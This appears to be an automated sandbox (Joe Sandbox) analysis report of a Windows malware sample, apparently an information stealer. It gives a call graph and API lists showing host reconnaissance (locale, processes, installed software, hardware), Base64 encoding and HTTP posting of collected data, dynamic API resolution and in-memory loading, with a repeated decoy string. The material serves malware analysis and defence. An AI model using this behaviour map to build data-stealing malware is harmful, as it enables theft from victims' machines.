bfa9b0 4 API calls 15102 bf1e19 15101->15102 15103 bfa8a0 lstrcpy 15102->15103 15104 bf1e22 15103->15104 15105 bfa9b0 4 API calls 15104->15105 15106 bf1e41 15105->15106 15107 bfa8a0 lstrcpy 15106->15107 15108 bf1e4a 15107->15108 15109 bfa9b0 4 API calls 15108->15109 15110 bf1e6b 15109->15110 15111 bfa8a0 lstrcpy 15110->15111 15112 bf1e74 15111->15112 15761 bf7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15112->15761 15115 bfa9b0 4 API calls 15116 bf1e94 15115->15116 15117 bfa8a0 lstrcpy 15116->15117 15118 bf1e9d 15117->15118 15119 bfa9b0 4 API calls 15118->15119 15120 bf1ebc 15119->15120 15121 bfa8a0 lstrcpy 15120->15121 15122 bf1ec5 15121->15122 15123 bfa9b0 4 API calls 15122->15123 15124 bf1ee5 15123->15124 15125 bfa8a0 lstrcpy 15124->15125 15126 bf1eee 15125->15126 15764 bf7b00 GetUserDefaultLocaleName 15126->15764 15129 bfa9b0 4 API calls 15130 bf1f0e 15129->15130 15131 bfa8a0 lstrcpy 15130->15131 15132 bf1f17 15131->15132 15133 bfa9b0 4 API calls 15132->15133 15134 bf1f36 15133->15134 15135 bfa8a0 lstrcpy 15134->15135 15136 bf1f3f 15135->15136 15137 bfa9b0 4 API calls 15136->15137 15138 bf1f60 15137->15138 15139 bfa8a0 lstrcpy 15138->15139 15140 bf1f69 15139->15140 15768 bf7b90 15140->15768 15142 bf1f80 15143 bfa920 3 API calls 15142->15143 15144 bf1f93 15143->15144 15145 bfa8a0 lstrcpy 15144->15145 15146 bf1f9c 15145->15146 15147 bfa9b0 4 API calls 15146->15147 15148 bf1fc6 15147->15148 15149 bfa8a0 lstrcpy 15148->15149 15150 bf1fcf 15149->15150 15151 bfa9b0 4 API calls 15150->15151 15152 bf1fef 15151->15152 15153 bfa8a0 lstrcpy 15152->15153 15154 bf1ff8 15153->15154 15780 bf7d80 GetSystemPowerStatus 15154->15780 15157 bfa9b0 4 API calls 15158 bf2018 15157->15158 15159 bfa8a0 lstrcpy 15158->15159 15160 bf2021 15159->15160 15161 bfa9b0 4 API calls 15160->15161 15162 bf2040 15161->15162 15163 bfa8a0 lstrcpy 15162->15163 15164 bf2049 15163->15164 15165 bfa9b0 4 API calls 15164->15165 15166 bf206a 15165->15166 15167 bfa8a0 lstrcpy 15166->15167 15168 bf2073 15167->15168 15169 bf207e GetCurrentProcessId 15168->15169 15782 bf9470 OpenProcess 15169->15782 15172 bfa920 3 API calls 15173 bf20a4 15172->15173 15174 bfa8a0 lstrcpy 15173->15174 15175 bf20ad 15174->15175 15176 bfa9b0 4 API calls 15175->15176 15177 bf20d7 15176->15177 15178 bfa8a0 lstrcpy 15177->15178 15179 bf20e0 15178->15179 15180 bfa9b0 4 API calls 15179->15180 15181 bf2100 15180->15181 15182 bfa8a0 lstrcpy 15181->15182 15183 bf2109 15182->15183 15787 bf7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15183->15787 15186 bfa9b0 4 API calls 15187 bf2129 15186->15187 15188 bfa8a0 lstrcpy 15187->15188 15189 bf2132 15188->15189 15190 bfa9b0 4 API calls 15189->15190 15191 bf2151 15190->15191 15192 bfa8a0 lstrcpy 15191->15192 15193 bf215a 15192->15193 15194 bfa9b0 4 API calls 15193->15194 15195 bf217b 15194->15195 15196 bfa8a0 lstrcpy 15195->15196 15197 bf2184 15196->15197 15791 bf7f60 15197->15791 15200 bfa9b0 4 API calls 15201 bf21a4 15200->15201 15202 bfa8a0 lstrcpy 15201->15202 15203 bf21ad 15202->15203 15204 bfa9b0 4 API calls 15203->15204 15205 bf21cc 15204->15205 15206 bfa8a0 lstrcpy 15205->15206 15207 bf21d5 15206->15207 15208 bfa9b0 4 API calls 15207->15208 15209 bf21f6 15208->15209 15210 bfa8a0 lstrcpy 15209->15210 15211 bf21ff 15210->15211 15804 bf7ed0 GetSystemInfo wsprintfA 15211->15804 15214 bfa9b0 4 API calls 15215 bf221f 15214->15215 15216 bfa8a0 lstrcpy 15215->15216 15217 bf2228 15216->15217 15218 bfa9b0 4 API calls 15217->15218 15219 bf2247 15218->15219 15220 bfa8a0 lstrcpy 15219->15220 15221 bf2250 15220->15221 15222 bfa9b0 4 API calls 15221->15222 15223 bf2270 15222->15223 15224 bfa8a0 lstrcpy 15223->15224 15225 bf2279 15224->15225 15806 bf8100 GetProcessHeap RtlAllocateHeap 15225->15806 15228 bfa9b0 4 API calls 15229 bf2299 15228->15229 15230 bfa8a0 lstrcpy 15229->15230 15231 bf22a2 15230->15231 15232 bfa9b0 4 API calls 15231->15232 15233 bf22c1 15232->15233 15234 bfa8a0 lstrcpy 15233->15234 15235 bf22ca 15234->15235 15236 bfa9b0 4 API calls 15235->15236 15237 bf22eb 15236->15237 15238 bfa8a0 lstrcpy 15237->15238 15239 bf22f4 15238->15239 15812 bf87c0 15239->15812 15242 bfa920 3 API calls 15243 bf231e 15242->15243 15244 bfa8a0 lstrcpy 15243->15244 15245 bf2327 15244->15245 15246 bfa9b0 4 API calls 15245->15246 15247 bf2351 15246->15247 15248 bfa8a0 lstrcpy 15247->15248 15249 bf235a 15248->15249 15250 bfa9b0 4 API calls 15249->15250 15251 bf237a 15250->15251 15252 bfa8a0 lstrcpy 15251->15252 15253 bf2383 15252->15253 15254 bfa9b0 4 API calls 15253->15254 15255 bf23a2 15254->15255 15256 bfa8a0 lstrcpy 15255->15256 15257 bf23ab 15256->15257 15817 bf81f0 15257->15817 15259 bf23c2 15260 bfa920 3 API calls 15259->15260 15261 bf23d5 15260->15261 15262 bfa8a0 lstrcpy 15261->15262 15263 bf23de 15262->15263 15264 bfa9b0 4 API calls 15263->15264 15265 bf240a 15264->15265 15266 bfa8a0 lstrcpy 15265->15266 15267 bf2413 15266->15267 15268 bfa9b0 4 API calls 15267->15268 15269 bf2432 15268->15269 15270 bfa8a0 lstrcpy 15269->15270 15271 bf243b 15270->15271 15272 bfa9b0 4 API calls 15271->15272 15273 bf245c 15272->15273 15274 bfa8a0 lstrcpy 15273->15274 15275 bf2465 15274->15275 15276 bfa9b0 4 API calls 15275->15276 15277 bf2484 15276->15277 15278 bfa8a0 lstrcpy 15277->15278 15279 bf248d 15278->15279 15280 bfa9b0 4 API calls 15279->15280 15281 bf24ae 15280->15281 15282 bfa8a0 lstrcpy 15281->15282 15283 bf24b7 15282->15283 15825 bf8320 15283->15825 15285 bf24d3 15286 bfa920 3 API calls 15285->15286 15287 bf24e6 15286->15287 15288 bfa8a0 lstrcpy 15287->15288 15289 bf24ef 15288->15289 15290 bfa9b0 4 API calls 15289->15290 15291 bf2519 15290->15291 15292 bfa8a0 lstrcpy 15291->15292 15293 bf2522 15292->15293 15294 bfa9b0 4 API calls 15293->15294 15295 bf2543 15294->15295 15296 bfa8a0 lstrcpy 15295->15296 15297 bf254c 15296->15297 15298 bf8320 17 API calls 15297->15298 15299 bf2568 15298->15299 15300 bfa920 3 API calls 15299->15300 15301 bf257b 15300->15301 15302 bfa8a0 lstrcpy 15301->15302 15303 bf2584 15302->15303 15304 bfa9b0 4 API calls 15303->15304 15305 bf25ae 15304->15305 15306 bfa8a0 lstrcpy 15305->15306 15307 bf25b7 15306->15307 15308 bfa9b0 4 API calls 15307->15308 15309 bf25d6 15308->15309 15310 bfa8a0 lstrcpy 15309->15310 15311 bf25df 15310->15311 15312 bfa9b0 4 API calls 15311->15312 15313 bf2600 15312->15313 15314 bfa8a0 lstrcpy 15313->15314 15315 bf2609 15314->15315 15861 bf8680 15315->15861 15317 bf2620 15318 bfa920 3 API calls 15317->15318 15319 bf2633 15318->15319 15320 bfa8a0 lstrcpy 15319->15320 15321 bf263c 15320->15321 15322 bf265a lstrlen 15321->15322 15323 bf266a 15322->15323 15324 bfa740 lstrcpy 15323->15324 15325 bf267c 15324->15325 15326 be1590 lstrcpy 15325->15326 15327 bf268d 15326->15327 15871 bf5190 15327->15871 15329 bf2699 15329->13761 16059 bfaad0 15330->16059 15332 be5009 InternetOpenUrlA 15336 be5021 15332->15336 15333 be502a InternetReadFile 15333->15336 15334 be50a0 InternetCloseHandle InternetCloseHandle 15335 be50ec 15334->15335 15335->13765 15336->15333 15336->15334 16060 be98d0 15337->16060 15339 bf0759 15340 bf077d 15339->15340 15341 bf0a38 15339->15341 15343 bf0799 StrCmpCA 15340->15343 15342 be1590 lstrcpy 15341->15342 15344 bf0a49 15342->15344 15345 bf0843 15343->15345 15346 bf07a8 15343->15346 16236 bf0250 15344->16236 15350 bf0865 StrCmpCA 15345->15350 15349 bfa7a0 lstrcpy 15346->15349 15351 bf07c3 15349->15351 15352 bf0874 15350->15352 15389 bf096b 15350->15389 15353 be1590 lstrcpy 15351->15353 15354 bfa740 lstrcpy 15352->15354 15355 bf080c 15353->15355 15357 bf0881 15354->15357 15358 bfa7a0 lstrcpy 15355->15358 15356 bf099c StrCmpCA 15359 bf09ab 15356->15359 15378 bf0a2d 15356->15378 15360 bfa9b0 4 API calls 15357->15360 15361 bf0823 15358->15361 15362 be1590 lstrcpy 15359->15362 15363 bf08ac 15360->15363 15364 bfa7a0 lstrcpy 15361->15364 15365 bf09f4 15362->15365 15366 bfa920 3 API calls 15363->15366 15367 bf083e 15364->15367 15368 bfa7a0 lstrcpy 15365->15368 15369 bf08b3 15366->15369 16063 befb00 15367->16063 15371 bf0a0d 15368->15371 15372 bfa9b0 4 API calls 15369->15372 15373 bfa7a0 lstrcpy 15371->15373 15374 bf08ba 15372->15374 15375 bf0a28 15373->15375 15378->13769 15389->15356 15711 bfa7a0 lstrcpy 15710->15711 15712 be1683 15711->15712 15713 bfa7a0 lstrcpy 15712->15713 15714 be1695 15713->15714 15715 bfa7a0 lstrcpy 15714->15715 15716 be16a7 15715->15716 15717 bfa7a0 lstrcpy 15716->15717 15718 be15a3 15717->15718 15718->14592 15720 be47c6 15719->15720 15721 be4838 lstrlen 15720->15721 15745 bfaad0 15721->15745 15723 be4848 InternetCrackUrlA 15724 be4867 15723->15724 15724->14669 15726 bfa740 lstrcpy 15725->15726 15727 bf8b74 15726->15727 15728 bfa740 lstrcpy 15727->15728 15729 bf8b82 GetSystemTime 15728->15729 15731 bf8b99 15729->15731 15730 bfa7a0 lstrcpy 15732 bf8bfc 15730->15732 15731->15730 15732->14684 15734 bfa931 15733->15734 15735 bfa988 15734->15735 15737 bfa968 lstrcpy lstrcat 15734->15737 15736 bfa7a0 lstrcpy 15735->15736 15738 bfa994 15736->15738 15737->15735 15738->14687 15739->14802 15741 be4eee 15740->15741 15742 be9af9 LocalAlloc 15740->15742 15741->14690 15741->14692 15742->15741 15743 be9b14 CryptStringToBinaryA 15742->15743 15743->15741 15744 be9b39 LocalFree 15743->15744 15744->15741 15745->15723 15746->14812 15747->14953 15748->14955 15749->14963 15878 bf77a0 15750->15878 15753 bf1c1e 15753->15045 15754 bf76c6 RegOpenKeyExA 15755 bf76e7 RegQueryValueExA 15754->15755 15756 bf7704 RegCloseKey 15754->15756 15755->15756 15756->15753 15758 bf1c99 15757->15758 15758->15059 15760 bf1e09 15759->15760 15760->15101 15762 bf7a9a wsprintfA 15761->15762 15763 bf1e84 15761->15763 15762->15763 15763->15115 15765 bf7b4d 15764->15765 15766 bf1efe 15764->15766 15885 bf8d20 LocalAlloc CharToOemW 15765->15885 15766->15129 15769 bfa740 lstrcpy 15768->15769 15770 bf7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15769->15770 15779 bf7c25 15770->15779 15771 bf7d18 15773 bf7d1e LocalFree 15771->15773 15774 bf7d28 15771->15774 15772 bf7c46 GetLocaleInfoA 15772->15779 15773->15774 15775 bfa7a0 lstrcpy 15774->15775 15778 bf7d37 15775->15778 15776 bfa8a0 lstrcpy 15776->15779 15777 bfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15777->15779 15778->15142 15779->15771 15779->15772 15779->15776 15779->15777 15781 bf2008 15780->15781 15781->15157 15783 bf94b5 15782->15783 15784 bf9493 GetModuleFileNameExA CloseHandle 15782->15784 15785 bfa740 lstrcpy 15783->15785 15784->15783 15786 bf2091 15785->15786 15786->15172 15788 bf7e68 RegQueryValueExA 15787->15788 15790 bf2119 15787->15790 15789 bf7e8e RegCloseKey 15788->15789 15789->15790 15790->15186 15792 bf7fb9 GetLogicalProcessorInformationEx 15791->15792 15793 bf7fd8 GetLastError 15792->15793 15800 bf8029 15792->15800 15794 bf8022 15793->15794 15803 bf7fe3 15793->15803 15797 bf2194 15794->15797 15799 bf89f0 2 API calls 15794->15799 15797->15200 15798 bf89f0 2 API calls 15801 bf807b 15798->15801 15799->15797 15800->15798 15801->15794 15802 bf8084 wsprintfA 15801->15802 15802->15797 15803->15792 15803->15797 15886 bf89f0 15803->15886 15889 bf8a10 GetProcessHeap RtlAllocateHeap 15803->15889 15805 bf220f 15804->15805 15805->15214 15807 bf89b0 15806->15807 15808 bf814d GlobalMemoryStatusEx 15807->15808 15809 bf8163 15808->15809 15810 bf819b wsprintfA 15809->15810 15811 bf2289 15810->15811 15811->15228 15813 bf87fb GetProcessHeap RtlAllocateHeap wsprintfA 15812->15813 15815 bfa740 lstrcpy 15813->15815 15816 bf230b 15815->15816 15816->15242 15818 bfa740 lstrcpy 15817->15818 15822 bf8229 15818->15822 15819 bf8263 15821 bfa7a0 lstrcpy 15819->15821 15820 bfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15820->15822 15823 bf82dc 15821->15823 15822->15819 15822->15820 15824 bfa8a0 lstrcpy 15822->15824 15823->15259 15824->15822 15826 bfa740 lstrcpy 15825->15826 15827 bf835c RegOpenKeyExA 15826->15827 15828 bf83ae 15827->15828 15829 bf83d0 15827->15829 15830 bfa7a0 lstrcpy 15828->15830 15831 bf83f8 RegEnumKeyExA 15829->15831 15832 bf8613 RegCloseKey 15829->15832 15841 bf83bd 15830->15841 15833 bf843f wsprintfA RegOpenKeyExA 15831->15833 15834 bf860e 15831->15834 15835 bfa7a0 lstrcpy 15832->15835 15836 bf8485 RegCloseKey RegCloseKey 15833->15836 15837 bf84c1 RegQueryValueExA 15833->15837 15834->15832 15835->15841 15838 bfa7a0 lstrcpy 15836->15838 15839 bf84fa lstrlen 15837->15839 15840 bf8601 RegCloseKey 15837->15840 15838->15841 15839->15840 15842 bf8510 15839->15842 15840->15834 15841->15285 15843 bfa9b0 4 API calls 15842->15843 15844 bf8527 15843->15844 15845 bfa8a0 lstrcpy 15844->15845 15846 bf8533 15845->15846 15847 bfa9b0 4 API calls 15846->15847 15848 bf8557 15847->15848 15849 bfa8a0 lstrcpy 15848->15849 15850 bf8563 15849->15850 15851 bf856e RegQueryValueExA 15850->15851 15851->15840 15852 bf85a3 15851->15852 15853 bfa9b0 4 API calls 15852->15853 15854 bf85ba 15853->15854 15855 bfa8a0 lstrcpy 15854->15855 15856 bf85c6 15855->15856 15857 bfa9b0 4 API calls 15856->15857 15858 bf85ea 15857->15858 15859 bfa8a0 lstrcpy 15858->15859 15860 bf85f6 15859->15860 15860->15840 15862 bfa740 lstrcpy 15861->15862 15863 bf86bc CreateToolhelp32Snapshot Process32First 15862->15863 15864 bf875d CloseHandle 15863->15864 15865 bf86e8 Process32Next 15863->15865 15866 bfa7a0 lstrcpy 15864->15866 15865->15864 15870 bf86fd 15865->15870 15868 bf8776 15866->15868 15867 bfa8a0 lstrcpy 15867->15870 15868->15317 15869 bfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15869->15870 15870->15865 15870->15867 15870->15869 15872 bfa7a0 lstrcpy 15871->15872 15873 bf51b5 15872->15873 15874 be1590 lstrcpy 15873->15874 15875 bf51c6 15874->15875 15890 be5100 15875->15890 15877 bf51cf 15877->15329 15881 bf7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15878->15881 15880 bf76b9 15880->15753 15880->15754 15882 bf7765 RegQueryValueExA 15881->15882 15883 bf7780 RegCloseKey 15881->15883 15882->15883 15884 bf7793 15883->15884 15884->15880 15885->15766 15887 bf8a0c 15886->15887 15888 bf89f9 GetProcessHeap HeapFree 15886->15888 15887->15803 15888->15887 15889->15803 15891 bfa7a0 lstrcpy 15890->15891 15892 be5119 15891->15892 15893 be47b0 2 API calls 15892->15893 15894 be5125 15893->15894 16050 bf8ea0 15894->16050 15896 be5184 15897 be5192 lstrlen 15896->15897 15898 be51a5 15897->15898 15899 bf8ea0 4 API calls 15898->15899 15900 be51b6 15899->15900 15901 bfa740 lstrcpy 15900->15901 15902 be51c9 15901->15902 15903 bfa740 lstrcpy 15902->15903 15904 be51d6 15903->15904 15905 bfa740 lstrcpy 15904->15905 15906 be51e3 15905->15906 15907 bfa740 lstrcpy 15906->15907 15908 be51f0 15907->15908 15909 bfa740 lstrcpy 15908->15909 15910 be51fd InternetOpenA StrCmpCA 15909->15910 15911 be522f 15910->15911 15912 be58c4 InternetCloseHandle 15911->15912 15913 bf8b60 3 API calls 15911->15913 15919 be58d9 ctype 15912->15919 15914 be524e 15913->15914 15915 bfa920 3 API calls 15914->15915 15916 be5261 15915->15916 15917 bfa8a0 lstrcpy 15916->15917 15918 be526a 15917->15918 15920 bfa9b0 4 API calls 15918->15920 15923 bfa7a0 lstrcpy 15919->15923 15921 be52ab 15920->15921 15922 bfa920 3 API calls 15921->15922 15924 be52b2 15922->15924 15931 be5913 15923->15931 15925 bfa9b0 4 API calls 15924->15925 15926 be52b9 15925->15926 15927 bfa8a0 lstrcpy 15926->15927 15928 be52c2 15927->15928 15929 bfa9b0 4 API calls 15928->15929 15930 be5303 15929->15930 15932 bfa920 3 API calls 15930->15932 15931->15877 15933 be530a 15932->15933 15934 bfa8a0 lstrcpy 15933->15934 15935 be5313 15934->15935 15936 be5329 InternetConnectA 15935->15936 15936->15912 15937 be5359 HttpOpenRequestA 15936->15937 15939 be58b7 InternetCloseHandle 15937->15939 15940 be53b7 15937->15940 15939->15912 15941 bfa9b0 4 API calls 15940->15941 15942 be53cb 15941->15942 15943 bfa8a0 lstrcpy 15942->15943 15944 be53d4 15943->15944 15945 bfa920 3 API calls 15944->15945 15946 be53f2 15945->15946 15947 bfa8a0 lstrcpy 15946->15947 15948 be53fb 15947->15948 15949 bfa9b0 4 API calls 15948->15949 15950 be541a 15949->15950 15951 bfa8a0 lstrcpy 15950->15951 15952 be5423 15951->15952 15953 bfa9b0 4 API calls 15952->15953 15954 be5444 15953->15954 15955 bfa8a0 lstrcpy 15954->15955 15956 be544d 15955->15956 15957 bfa9b0 4 API calls 15956->15957 15958 be546e 15957->15958 15959 bfa8a0 lstrcpy 15958->15959 16051 bf8ead CryptBinaryToStringA 16050->16051 16053 bf8ea9 16050->16053 16052 bf8ece GetProcessHeap RtlAllocateHeap 16051->16052 16051->16053 16052->16053 16054 bf8ef4 ctype 16052->16054 16053->15896 16055 bf8f05 CryptBinaryToStringA 16054->16055 16055->16053 16059->15332 16302 be9880 16060->16302 16062 be98e1 16062->15339 16064 bfa740 lstrcpy 16063->16064 16065 befb16 16064->16065 16237 bfa740 lstrcpy 16236->16237 16238 bf0266 16237->16238 16239 bf8de0 2 API calls 16238->16239 16240 bf027b 16239->16240 16241 bfa920 3 API calls 16240->16241 16242 bf028b 16241->16242 16243 bfa8a0 lstrcpy 16242->16243 16244 bf0294 16243->16244 16245 bfa9b0 4 API calls 16244->16245 16246 bf02b8 16245->16246 16303 be988e 16302->16303 16306 be6fb0 16303->16306 16305 be98ad ctype 16305->16062 16309 be6d40 16306->16309 16310 be6d63 16309->16310 16323 be6d59 16309->16323 16325 be6530 16310->16325 16314 be6dbe 16314->16323 16335 be69b0 16314->16335 16316 be6e2a 16317 be6ee6 VirtualFree 16316->16317 16319 be6ef7 16316->16319 16316->16323 16317->16319 16318 be6f41 16320 bf89f0 2 API calls 16318->16320 16318->16323 16319->16318 16321 be6f38 16319->16321 16322 be6f26 FreeLibrary 16319->16322 16320->16323 16324 bf89f0 2 API calls 16321->16324 16322->16319 16323->16305 16324->16318 16326 be6542 16325->16326 16328 be6549 16326->16328 16345 bf8a10 GetProcessHeap RtlAllocateHeap 16326->16345 16328->16323 16329 be6660 16328->16329 16332 be668f VirtualAlloc 16329->16332 16331 be6730 16333 be673c 16331->16333 16334 be6743 VirtualAlloc 16331->16334 16332->16331 16332->16333 16333->16314 16334->16333 16336 be69d5 16335->16336 16337 be69c9 16335->16337 16336->16316 16337->16336 16338 be6a09 LoadLibraryA 16337->16338 16338->16336 16339 be6a32 16338->16339 16342 be6ae0 16339->16342 16346 bf8a10 GetProcessHeap RtlAllocateHeap 16339->16346 16341 be6ba8 GetProcAddress 16341->16336 16341->16342 16342->16336 16342->16341 16343 bf89f0 2 API calls 16343->16342 16344 be6a8b 16344->16336 16344->16343 16345->16328 16346->16344

                              Executed Functions

                              Function 00BF9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 bf9860-bf9874 call bf9750 663 bf987a-bf9a8e call bf9780 GetProcAddress * 21 660->663 664 bf9a93-bf9af2 LoadLibraryA * 5 660->664 663->664 665 bf9b0d-bf9b14 664->665 666 bf9af4-bf9b08 GetProcAddress 664->666 669 bf9b46-bf9b4d 665->669 670 bf9b16-bf9b41 GetProcAddress * 2 665->670 666->665 671 bf9b4f-bf9b63 GetProcAddress 669->671 672 bf9b68-bf9b6f 669->672 670->669 671->672 673 bf9b89-bf9b90 672->673 674 bf9b71-bf9b84 GetProcAddress 672->674 675 bf9b92-bf9bbc GetProcAddress * 2 673->675 676 bf9bc1-bf9bc2 673->676 674->673 675->676
                              APIs
                              • GetProcAddress.KERNEL32(77190000,009B15E8), ref: 00BF98A1
                              • GetProcAddress.KERNEL32(77190000,009B16F0), ref: 00BF98BA
                              • GetProcAddress.KERNEL32(77190000,009B1738), ref: 00BF98D2
                              • GetProcAddress.KERNEL32(77190000,009B1588), ref: 00BF98EA
                              • GetProcAddress.KERNEL32(77190000,009B16A8), ref: 00BF9903
                              • GetProcAddress.KERNEL32(77190000,009B8B38), ref: 00BF991B
                              • GetProcAddress.KERNEL32(77190000,009A55E8), ref: 00BF9933
                              • GetProcAddress.KERNEL32(77190000,009A53A8), ref: 00BF994C
                              • GetProcAddress.KERNEL32(77190000,009B1510), ref: 00BF9964
                              • GetProcAddress.KERNEL32(77190000,009B14F8), ref: 00BF997C
                              • GetProcAddress.KERNEL32(77190000,009B1618), ref: 00BF9995
                              • GetProcAddress.KERNEL32(77190000,009B16C0), ref: 00BF99AD
                              • GetProcAddress.KERNEL32(77190000,009A5408), ref: 00BF99C5
                              • GetProcAddress.KERNEL32(77190000,009B1630), ref: 00BF99DE
                              • GetProcAddress.KERNEL32(77190000,009B17C8), ref: 00BF99F6
                              • GetProcAddress.KERNEL32(77190000,009A5708), ref: 00BF9A0E
                              • GetProcAddress.KERNEL32(77190000,009B15A0), ref: 00BF9A27
                              • GetProcAddress.KERNEL32(77190000,009B1660), ref: 00BF9A3F
                              • GetProcAddress.KERNEL32(77190000,009A5728), ref: 00BF9A57
                              • GetProcAddress.KERNEL32(77190000,009B1870), ref: 00BF9A70
                              • GetProcAddress.KERNEL32(77190000,009A5428), ref: 00BF9A88
                              • LoadLibraryA.KERNEL32(009B1810,?,00BF6A00), ref: 00BF9A9A
                              • LoadLibraryA.KERNEL32(009B1888,?,00BF6A00), ref: 00BF9AAB
                              • LoadLibraryA.KERNEL32(009B1840,?,00BF6A00), ref: 00BF9ABD
                              • LoadLibraryA.KERNEL32(009B18B8,?,00BF6A00), ref: 00BF9ACF
                              • LoadLibraryA.KERNEL32(009B1828,?,00BF6A00), ref: 00BF9AE0
                              • GetProcAddress.KERNEL32(76850000,009B17F8), ref: 00BF9B02
                              • GetProcAddress.KERNEL32(77040000,009B18A0), ref: 00BF9B23
                              • GetProcAddress.KERNEL32(77040000,009B1858), ref: 00BF9B3B
                              • GetProcAddress.KERNEL32(75A10000,009B8D50), ref: 00BF9B5D
                              • GetProcAddress.KERNEL32(75690000,009A5448), ref: 00BF9B7E
                              • GetProcAddress.KERNEL32(776F0000,009B8B98), ref: 00BF9B9F
                              • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00BF9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00BF9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: a4e3679a05b9e149a3d9dcaac01860ed23345fd25434b64eea23b42cc87d1dd7
                              • Instruction ID: 7fda3ccd00f2c9d54a499cedb911d064d096a1c78e27e9f1b13129d55bd53a35
                              • Opcode Fuzzy Hash: a4e3679a05b9e149a3d9dcaac01860ed23345fd25434b64eea23b42cc87d1dd7
                              • Instruction Fuzzy Hash: 6BA14CB55002409FD368EFAAFE88A6637F9F74C70170C453AE606E3264D739984BCB56
                              Function 00BE45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 be45c0-be4695 RtlAllocateHeap 781 be46a0-be46a6 764->781 782 be474f-be47a9 VirtualProtect 781->782 783 be46ac-be474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BE479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45F3
